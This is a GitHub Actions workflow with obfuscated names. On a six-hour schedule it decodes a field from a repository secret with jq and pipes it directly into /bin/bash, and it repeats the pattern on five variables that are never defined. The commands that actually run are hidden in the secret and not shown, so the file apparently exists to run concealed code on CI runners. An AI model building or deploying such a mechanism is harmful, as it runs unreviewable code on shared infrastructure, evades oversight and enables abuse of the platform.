name: shitiancaoha

on:
  workflow_dispatch:
  schedule:
    - cron: '59 5/6 * * *'

jobs:  # 22841
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shitiancaoha
        env:
          nbn038: ${{ secrets.nbn038 }}
        run: |
          echo $nbn038 | jq -r .xszc003 | /bin/bash
          echo $ed5477 | jq -r .rr25 | /bin/bash
          echo $z92712 | jq -r .p7 | /bin/bash
          echo $pzxw7 | jq -r .mhx9 | /bin/bash
          echo $p52445 | jq -r .ma13450 | /bin/bash
          echo $zk22 | jq -r .ujh16990 | /bin/bash

